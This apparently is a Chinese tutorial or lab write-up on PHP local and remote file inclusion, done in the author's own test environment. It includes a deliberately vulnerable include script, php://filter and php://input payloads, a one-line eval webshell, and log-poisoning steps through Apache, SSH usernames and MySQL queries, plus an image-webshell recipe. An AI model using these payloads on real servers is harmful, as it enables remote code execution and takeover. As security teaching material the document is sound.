文件包含漏洞原理
1、源代码
<?php
$filename = $_GET['filename'];
include $filename; //或include_once,require,require_once
echo "欢迎来到PHP的世界.";
?>2、利用条件
php.ini中alllow_url_fopen=On(默认开启)和allow_url_include=Off(默认关闭)要开启
用户参数可控且后台代码没有对包含的文件进行过滤
3、利用方式
http://localhost/文件包含-practice/fileinc.php
报错的内容是文件名不能为空,且无法打开,那我们就给上传一个文件名的参数,即
http://localhost/文件包含-practice/fileinc.php?filename=common.php
http://localhost/文件包含-practice/a.php?username=zhangsan&password=123456
http://localhost/文件包含-practice/fileinc.php?filename=a.php
http://localhost/文件包含-practice/fileinc.php?filename=a.php?username=zhangsan&password=123456
回显提示我们传入的filename值为:a.php?username=zhangsan,我们的目的的文件名是a.php,所以就没有找到对应的文件,就会报错,将?改为&即可,回显如下图所示:
http://localhost/文件包含-practice/fileinc.php?filename=a.php&username=zhangsan&password=123456
http://localhost/文件包含-practice/fileinc.php?filename=./login.html
一旦使用include或其他三个文件包含的函数,那么无论包含的文件的后缀名是什么,均会当成PHP代码执行
远程文件包含
1、利用条件
php.ini中allow_url_fopen=On(默认开启)和allow_url_include=Off(默认关闭)要开启
用户参数可控且后台代码没有对包含的文件进行过滤
2、利用方式
http://localhost/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB-practice/fileinc.php?filename=http://localhost/review/shell.php?code=phpinfo();
fileinc.php?filename=http://localhost/review/shell.php?code=phpinfo();,该段payload首先执行http://localhost/review/shell.php?code=phpinfo();,回显的内容是第二个主机中的phpinfo,而不是我们想要的,我们可以将shell.php修改为shell.txt,将?修改为&,这样的话不会回显第二个主机中的phpinfo,因为首先读取的是shell.txt中的一句话木马,将一句话木马的内容赋值给$filename,其次才会执行code=phpinfo();,返回的是我们想要的phpinfo
(fileinc.php?filename=http://localhost/review/shell.txt&code=phpinfo();)
PHP伪协议利用
一、伪协议介绍
PHP支持以下几种协议:
file:// -访问本地文件系统
http:// -访问HTTP(S)网址
ftp:// -访问FTP(S) URLS
php:// -访问各个输入/输出流(I/O streams)
zlib:// -压缩流
data:// -数据(RFC 2397)
glob:// -查找匹配的文件路径模式
phar:// -PHP 归档
ssh2:// -Secure Shell 2
rar:// -RAR
ogg:// -音频流
expect:// -处理交互式的流php://是一种伪协议,主要是开启了一个输入输出流,理解为文件数据传输的一个通道。php中的伪协议常使用的有如下几个:
php://input php://filter phar://
二、php://filter
当我们直接包含common.php文件的时候,http://localhost/文件包含-practice/fileinc.php?filename=common.php
虽然代码已经调用,但是因为其是php文档,被web容器解释,导致页面看不到源码内容。
这时候使用php://将我们要读取的文件放在数据流里,然后我们通过伪协议的方式读出来
php://filter/read/convert/base64-encode/resource=common.php
http://localhost/文件包含-practice/fileinc.php?filename=php://filter/read/convert.base64-encode/resource=common.php这段命令的意思就是打开数据流,把common.php的内容用base64编码的方式读出来
我们执行后,在页面上就能看到一串base64编码的方式,通过工具解码后就能看到明文源码
三、php://input
此方法需要条件,即开启allow_url_include=On。实际上这相当于一个远程包含的利用。
php://打开文件流后,我们直接在流里面写入我们的恶意代码,此时包含既可执行代码。
http://localhost/文件包含-practice/fileinc.php?filename=php://input
然后在POST请求中输入恶意代码,执行包含既可实现恶意代码的执行,比如:
<?php phpinfo(); ?>
<?php system(`ifconfig`); ?>
文件包含漏洞利用
文件包含
程序员对于多次使用的代码或数据,将其封装成一个文件,使用include,require等函数进行包含调用
文件包含漏洞
由于web应用对于用户输入的数据没有进行严格的过滤或没有进行过滤,导致用户输入的数据可以直接接触危险函数include,require等函数,从而使用户或攻击者的文件内容执行,使服务器沦陷。
首先先进入到/opt/lampp/logs,看一下其日志
将access_log和mysql_log给删除掉,然后再重新启动服务,日志文件就会重新生成
访问一下这个网址,发现日志信息中已经被记载啦
访问一下这个网址,发现无法找到对象
查看日志文件,发现多了一条记录
然后去访问一下这个日志,发现已经被包含进去了
我们发现有问题,通过查看原文件可以知道有些符号被转码了,有可能是浏览器先进行转码,然后发送给服务器,服务器如实的将其给记录下来,当浏览器进行访问的时候,服务器将其直接给发送过来了
我们在后面直接跟上一句话木马,然后不要让浏览器进行发送,使用bp抓包,通过bp去发送给服务器
发现日志依旧被转码
从bp中可以得知,是浏览器进行转码的
从bp中进行修改,将被转码的给修改过来
将抓取到的先发送到repeter,然后进行forward
然后再去查看一下日志,发现没有被转码的,大概率有可能成功,但是后面的东西没有了 ,应该是遇到空格就会截断
将空格删除了,然后send
然后去查看日志,发现全部没有被转码,成功写入
然后使用文件包含,给我们回显的内容是400,964,说明已经开始执行php代码了
将只有<?php的日志给删除
然后再去执行一下,给我们回显的内容是找不到phpinfo()这个函数,是因为在日志中函数与<?php和后面的?>连接到了一起,无法查找到这个函数
将转码成功的日志删除掉,进去repeter,将<?php中的php给删除掉,只变成<?phpinfo()?>,然后send,发现日志没有被记录进去,然后无论如何修改,日志都无法记录进去,我们可以重启一下,发现可以被记录进去了
然后send
发现被记录进去了
然后我们将日志文件包含进去访问一下,利用成功
文件路径如果遇到空格就会被切断的话,还有一个办法就是,在一句话木马两边加上双引号,里边的东西就不会被切断,也可以正常的去写php,也就是<?php @eval($_POST['code']); ?>
然后发送出去
去查看日志,发现写入成功,但是?不见啦。所以我们将后面的空格给删除了,重新发送一遍
发现写入成功,成功构造出了一句话木马,将倒数第二行给删除,如果存在的话就会报错,无法执行我们最新写进去的一句话木马
然后继续执行就可以看到文件包含成功了,phpinfo()被正常的解析
使用菜刀进行连接
成功获取到了权限
利用前提
(1)存在一个文件包含漏洞点
(2)我们有其他可控点可以写入到本地文件
(3)写入的本地文件路径可知或可预测
包含web日志
前期通过信息搜集,得到了相关的服务器信息,比如得知中间件是apache
apache记录web日志的文件有access.log和error.log
这时候我们访问服务器的时候,通过burp修改我们的请求,将恶意代码写在请求内,这时候web日志就会将我们的恶意代码写入到日志文件中。由于日志文件一般来说都说默认的路径,比较容易猜测,这样就满足了我们的本地包含getshell的条件。
比如get请求 get"<?php phpinfo();?>".html
包含登录日志
如果发现一个Linux系统,开放了22端口,同时存在文件包含漏洞。那么我们可以构造恶意登录在ssh登录日志中写入恶意代码。
Linux默认登录日志路径: /var/log/auth.log或/var/log/secure
使用xshell或ssh命令进行ssh登录:ssh"<?php phpinfo(); ?>"@192.68.3.17,此时,登录日志中将出现PHP代码。
如果MySQL开放远程登录,我们也同样可以登录MySQL并包含MySQL日志:mysql -u "<?php phpinfo(); ?>" -p -h 192.168.3.17
在Linux上默认是关闭MySQL日志的,开启MySQL日志:
o+r的权限,就是允许其他用户可读
首先进入到log目录下
其次使用ll查看一下文件的权限等等问题
secure默认日志文件其他账号是不能够进行读取的
在secure日志中找到了能够进行包含的日志文件
进行日志的实时监听,找一找可以使用的点,rhost那儿不行,因为那是我们本机登录的客户端IP地址,然后继续往下看,发现有用户
我们可以在用户这个层面上进行注入,直接输入<?phpinfo();?>发现会报错,我们在两边加上双引号,让它成为一个字符串,然后进行执行
发现执行成功,写了一条日志,用户名在日志中出现了,那么就是一个有效的php代码,然后就可以使用文件包含进行执行这个有效的php代码
进入到mysql的日志信息中去,经过观察,有一些mysql的登录信息
使用远程登录数据库,然后将密码输错,在用户名那儿进行做文章
mysql -u "<?php phpinfo(); ?>" -p -h 192.168.122.188
然后查看mysql的日志,发现有被包含进去的有效的PHP代码
然后在浏览器上访问mysql的日志,发现权限不允许
然后通过ll命令去查看mysql.log的访问权限,mysql的日志文件是由mysql这个用户生成的
我们给其授予o+r的权限,因为我们是root用户,所以可以授权,同时也是我们自己的环境,如果是现实真实环境的话,我们就无法去做到授予权限
然后再去查看mysql.log的日志权限,发现已经有r的权限啦,然后我们就可以进行包含利用啦
然后再继续访问,发现可以包含成功了,成功解析了日志文件中的有效的PHP代码
首先进入到mysql目录下,然后使用ll命令查看文件的权限,我们可以自己创建一个目录,把这个目录当作mysql日志信息的目录,然后修改owner,修改为mysql用户,意思是该mysql的日志信息是由mysql用户写入的,将 log 目录(或文件)的所有者更改为用户 mysql
包含mysql日志
包含mysql一般是在成功访问到MySQL后实现的。攻击者进入MySQL,可以通过数据库查询接口,实现恶意代码的写入mysql日志。方法和原理与包含Web日志相同。比如进入phpmyadmin后台,或者爆破成功进入MySQL。
查看日志文件状态:show varianbles like 'general_log'
写入恶意代码:select "<?php @eval($_POST['code']); ?>",根据日志文件路径即可包含。虽然能够到这一步,已经是渗透测试成功,但是如果Web服务器的权限更高的话,那么可以让Web服务器来包含日志,这样Web Shell就会被高权限账号执行,实现提权。
进入到mysql的日志文件mysql.log,并用tail -f mysql.log进行实时查看
然后去执行这条mysql命令
找到刚才的SQL语句,里面有一段有效的PHP代码
我们已经能够执行SQL语句,说明我们获得了一个比较高的权限,不存在包含日志,有可能是因为不同账户之间存在一些权限的问题,所以我们就想着用mysql账户去写一条日志,在web浏览器上包含进来,然后可以使用web服务器的权限来执行了,如果web服务器的权限比较高,我们就成功的提权了
包含上传文件
上传的话因为会检查后缀名,导致直接上传可执行文件失败,如果存在文件包含,就可以上传符合服务器的后缀名文件,但是在文件中写入恶意代码。比如使用图片马来进行文件上传,进而再将其包含进来
copy picture.jpg/b + shell.php/a picna.jpg首先先去找一张图片
使用浏览器去访问一下,图片包含进去就是这个样子,以文本的形式进行输出,所以我们想办法往图片里边插入一句话木马,就变成了图片马
随便去找一张图片
然后还有一个shell.php
同时打开这两个东西,我们将这两个东西合起来,制作一张图片马,进到该文件所在目录的终端里面
/b是二进制,表示cloud.jpg/b是一个二进制文件,shell.php/a是一个文本,将shell.php加到cloud.jpg的后面,然后复给picma.jpg
发现图片马也是一张图片,没有任何问题
将其用记事本打开,拉到最后面,发现有我们需要的PHP的有效的代码
上传这个图片马,发现上传成功
接下来在文件包含里面包含这个图片马,然后就可以得到phpinfo啦
还可以执行一些其他指令
包含临时文件
临时文件指的是服务器会短暂存储,但是后续很快删除的文件。比如上传检测的时候,某些检测机制会先把上传的文件保存到一个临时文件夹里或沙盒里,临时文件要看具体业务逻辑,而且包含临时文件需要利用条件竞争的方式。动静比较大,容易被发现。
竞争条件的使用方法:
a、使用burpsuite不停的发送上传包
b、我们在文件包含页面不停的尝试包含上传文件,期望恶意文件在被服务器删除之前访问到。
c、一旦包含成功,即使文件被删除,只要shell不断,就可以保持连接
包含session文件
通过cookie可以得知sessionID,session文件默认在服务器中存放的格式是sess_(sessID),而路径也是固定的,大多存在tmp目录下,因此只要找到一个可以控制session文件写入的点,就能利用包含漏洞getshell
让有效的PHP代码写入到session文件当中去
然后把session文件包含进去,只要里面有一段有效的PHP代码,我们就可以直接执行啦,最大的问题就是看看这个网站能不能构造出写session文件的地方,然后我们把代码给写进去,这个session文件是相对路径
我们也可以使用绝对路径
